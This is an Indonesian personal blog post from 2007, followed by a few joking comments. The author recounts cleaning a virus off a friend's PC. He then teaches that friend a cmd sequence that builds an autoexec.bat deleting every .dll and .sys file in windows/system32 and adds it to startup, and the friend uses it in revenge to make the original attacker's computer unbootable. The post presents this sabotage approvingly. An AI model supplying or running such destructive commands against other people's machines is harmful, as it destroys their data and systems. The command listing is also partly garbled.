Pembodohan Terhadap orang Yg belum tau

24 06 2007

Pembodohan Terhadap orang Yg belum tau

Minggu, 6 Mei 2007 @ 20:56 WIBDiari

ceritanya gini

aku punya temen namanya saga…
orang nya dudut banget klo make komputer!
padahal dia anak informatika..

ya maklum lah..dia udah pernah bilang ma aku klo dia sebenere salah jurusan!

jadi selama ini dia punya komputer hanya buat ngetik tugas dan main game!

nah kemaren malam minggu aku pas kebetulan lagi nongkrong di kost nya ada kejadian

komputer nya saga sengaja di inject virus sama temen nya nama nya yudhis

kontan saja..saga yg anak nya lugu dan masih awam cuman bisa marah marah sendiri! sedangkan si yudhis puas pulang dengan tertawa terbahak bahak!

karena kasian aku coba liat computernya dia! registry terdisable,run gone,folder options gone dan kerusakan di beberapa system windows nya!

so mau nga mau malam minggu ku habis untuk benerin komputer saga!hiks…

karena bersihin virusnya pake cara manual jadi agak lama deh
tapi alhamdullilah bisa beres itu virus dr komputer dia!

tidak cukup sampe di situ
si saga aku ajarin sekalian cara ngerusak Sistem operasi

lewat perintah cmd

copy con autoexec.bat
del c:/autoexec.bat
copy autoexecbat to c:/
del windows/system32/*.dll
del windows/system32/*.sys

ctrl Z

enter 1 file copied

masukin startup

apa yg terjadi komputer tidak mau booting!
hak hak hak hak

aku suruh dia melakukan di komputer nya si yudhis yg sudah ngerusak komputer dia (balas dendam istilahnya)

apa yg terjadi? yup bener banget komputernya si yudhis nga bisa boot ke windows sama sekali

dan si yudhis minta tolong ke aku suruh benerin komputernya

ya saya jawab
“males ah, katanya jago virus kok minta tolong ke aku, makanya klo masih script kiddies jgn sok sok an ngerusak komputer orang”

sambil pergi meninggalkan dia yg kayak orang bego!

so buat temen temen,janganlah melakukan pembodohan sama orang yg belum ngerti, berbagi ilmu berbagi penggetahuan adalah hal yg sangat mulia!dan jangan pernah merasa sok jago padahal hanya script kiddies yg masih kebanyakan tukang jiplak!

bener banget yg dikatakan BRONTOK “TUKANG JIPLAK NOTHING”


Aksi

Information

3 responses

30 06 2007
LaR

huahahaha…tega nian si penguin…

1 07 2007
Wahyu

kowe yo tegoo nyelundup erlin seko vajra😛 wjajakakakka

4 07 2007
LaR

zzzzzz…

bajigur…

Tinggalkan Balasan

